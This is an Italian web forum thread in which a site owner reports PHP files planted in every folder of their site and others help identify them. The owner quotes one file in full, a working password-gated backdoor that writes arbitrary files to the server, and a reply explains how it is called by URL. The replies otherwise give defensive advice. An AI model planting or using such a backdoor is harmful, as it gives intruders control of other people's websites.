Aiuto per files "sospetti" dentro al mio sito

[mld]

Ciao a tutti, un aiutino...

Sono andato a ricontrollare le varie cartelle del mio sito (quindi in remoto) e dentro ogni cartella ho trovato un files (che non ho messo io) sempre con nomi diversi (stats, include, init, script, images....) e con un contenuto sempre simile a questo

codice:

<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>

cos'è???

[RoTeam]

Sembrerebbe un bel code injecter, praticamente chi ti ha messo quel file puo modificare
i files che vuole e come vuole semplicemente inviando le variabili richieste.

Rimuovi subito tutti quei files....


Es. via url ?p=password...&f=nomefile&b=codici da inniettare...

[mld]

In verità appena me ne sono accorto li ho subito rimossi...

per la cronoca sono stati inseriti sempre intorno alle 5 del mattino a partire dall'estate 2011 fino alla primavera 2012 sempre uno per ogni cartella...

comunque da quello che vedo io i miei files sono sempre quelli che ho messo io...senza modifiche...

[mld]

Qualche giorno fa però mi hanno modificato l'htaccess
così

codice:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
</IfModule>

[homerbit]

modifica i permessi di accesso delle cartelle che non devno esser modificate in sola lettura, idem per il file .htaccess (cosa molto strana che lo abbiano modificato terzi!)
Sei sicuro di essere l'unico proprietario dei dati di accesso al sito ?
Monitora la situazione, al limite senti anche il tuo provider.
Ciao